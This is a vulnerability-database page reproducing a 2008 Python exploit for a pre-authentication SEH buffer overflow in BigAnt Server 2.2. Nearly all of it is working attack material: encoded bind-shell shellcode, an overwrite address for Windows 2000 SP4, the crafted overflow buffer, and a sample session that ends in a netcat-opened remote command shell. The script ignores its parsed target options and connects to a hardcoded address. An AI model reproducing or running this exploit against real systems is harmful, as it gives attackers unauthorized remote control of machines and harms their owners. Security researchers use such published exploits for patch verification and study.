Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19686
HistoryApr 17, 2008 - 12:00 a.m.

BigAnt Server 2.2 PreAuth Remote SEH Overflow Exploit (0day)

2008-04-1700:00:00
vulners.com
6
JSON

PR: n/a I: 10,500 L: 0 LD: 246,240 I: 70400 Rank: 18167 Age: Feb 17, 2004 I: 0
whois source Density Links: 0|0

#!/usr/bin/python
###############################################################################

BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow (0day)

Matteo Memelli aka ryujin

http://www.r57shell.in - http://adult.wikipediatr.com - http://www.wikipediatr.com

04/13/2008

Tested on Windows 2000 Sp4 English

Vulnerable process is AntServer.exe

Offset for SEH overwrite is 954 Bytes

#------------------------------------------------------------------------------

muts you gave me the wrong pill! it's your fault!!!

I wanna go back to the matrix

#------------------------------------------------------------------------------

bt ~ # ./antserver_exploit.py -H 192.168.1.195 -P 6080

[+] Connecting to host…

[+] Overflowing the buffer…

[+] Done! Check your shell on 192.168.1.195:6080

bt ~ # nc -vv 192.168.1.195 4444

192.168.1.195: inverse host lookup failed: Unknown host

(UNKNOWN) [192.168.1.195] 4444 (krb524) open

Microsoft Windows 2000 [Version 5.00.2195]

(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

###############################################################################
from socket import *
from optparse import OptionParser
import sys

print "[]"
print "[ ]"
print "[ BigAnt Server PreAuth Remote SEH Overflow (0day) ]"
print "[ Discovered and Coded By ]"
print "[ Matteo Memelli ]"
print "[ (ryujin) ]"
print "[ www.be4mind.com - www.gray-world.net ]"
print "[ ]"
print "[]"
usage = "%prog -H TARGET_HOST -P TARGET_PORT"
parser = OptionParser(usage=usage)
parser.add_option("-H", "–target_host", type="string",
action="store", dest="HOST",
help="Target Host")
parser.add_option("-P", "–target_port", type="int",
action="store", dest="PORT",
help="Target Port")
(options, args) = parser.parse_args()
HOST = options.HOST
PORT = options.PORT
if not (HOST and PORT):
parser.print_help()
sys.exit()

Tried with SEH/THREAD/PROCESS but server crashes anyway

[*] x86/alpha_mixed succeeded, final size 698 SEH

shellcode = (
"\x89\xe1\xda\xc0\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4b\x58\x4a\x59\x4b\x4f\x4b"
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x47\x54\x47\x54\x4c\x4b"
"\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x43\x48\x45\x51\x4a"
"\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x51\x30\x45\x51"
"\x4a\x4b\x47\x39\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
"\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x42\x54\x44\x47"
"\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47"
"\x4b\x46\x34\x47\x54\x47\x58\x42\x55\x4b\x55\x4c\x4b\x51\x4f"
"\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x45\x31\x49\x53\x50\x31\x49"
"\x4b\x42\x44\x4c\x4b\x47\x33\x50\x30\x4c\x4b\x47\x30\x44\x4c"
"\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
"\x4e\x36\x42\x46\x51\x43\x42\x46\x43\x58\x47\x43\x50\x32\x42"
"\x48\x42\x57\x43\x43\x50\x32\x51\x4f\x51\x44\x4b\x4f\x4e\x30"
"\x43\x58\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x4e"
"\x36\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x45\x58"
"\x43\x32\x50\x55\x42\x4a\x44\x42\x4b\x4f\x48\x50\x43\x58\x49"
"\x49\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48\x56\x46\x33"
"\x46\x33\x50\x53\x50\x53\x46\x33\x47\x33\x46\x33\x51\x53\x46"
"\x33\x4b\x4f\x4e\x30\x45\x36\x42\x48\x42\x31\x51\x4c\x45\x36"
"\x50\x53\x4b\x39\x4d\x31\x4c\x55\x42\x48\x49\x34\x44\x5a\x44"
"\x30\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x42\x30\x46\x31"
"\x51\x45\x4b\x4f\x48\x50\x43\x58\x4e\x44\x4e\x4d\x46\x4e\x4b"
"\x59\x51\x47\x4b\x4f\x48\x56\x46\x33\x50\x55\x4b\x4f\x48\x50"
"\x42\x48\x4a\x45\x47\x39\x4b\x36\x47\x39\x51\x47\x4b\x4f\x4e"
"\x36\x46\x30\x46\x34\x46\x34\x50\x55\x4b\x4f\x4e\x30\x4a\x33"
"\x43\x58\x4a\x47\x44\x39\x49\x56\x44\x39\x46\x37\x4b\x4f\x49"
"\x46\x46\x35\x4b\x4f\x48\x50\x42\x46\x43\x5a\x42\x44\x45\x36"
"\x42\x48\x45\x33\x42\x4d\x4c\x49\x4d\x35\x42\x4a\x50\x50\x46"
"\x39\x47\x59\x48\x4c\x4d\x59\x4a\x47\x43\x5a\x51\x54\x4d\x59"
"\x4a\x42\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x51\x52\x46"
"\x4d\x4b\x4e\x50\x42\x46\x4c\x4d\x43\x4c\x4d\x42\x5a\x46\x58"
"\x4e\x4b\x4e\x4b\x4e\x4b\x42\x48\x43\x42\x4b\x4e\x4e\x53\x42"
"\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x48\x56\x51\x4b\x50\x57"
"\x46\x32\x46\x31\x50\x51\x50\x51\x43\x5a\x43\x31\x46\x31\x50"
"\x51\x51\x45\x50\x51\x4b\x4f\x4e\x30\x42\x48\x4e\x4d\x49\x49"
"\x43\x35\x48\x4e\x50\x53\x4b\x4f\x49\x46\x43\x5a\x4b\x4f\x4b"
"\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
"\x48\x44\x45\x34\x4b\x4f\x49\x46\x46\x32\x4b\x4f\x4e\x30\x45"
"\x38\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x51\x43\x4b\x4f\x48\x56"
"\x4b\x4f\x48\x50\x44\x4a\x41\x41"
)

77F8AEDC POP POP RET User32.dll Win 2000 Sp4

evilbuf = '\x90'*252 + shellcode + '\xeb\x06\x90\x90' + \
'\xDC\xAE\xF8\x77' + '\x90'*8 + '\xE9\x82\xFC\xFF\xFF' + \
'C'*1225
print '[+] Connecting to host…'
s = socket(AF_INET, SOCK_STREAM)
s.connect(('192.168.1.195', 6080))
print '[+] Overflowing the buffer…'
s.send('GET ' + evilbuf + "\n\n")
s.close()
print '[+] Done! Check your shell on %s:%d' % (HOST, PORT)

milw0rm.com [2008-04-15]

JSON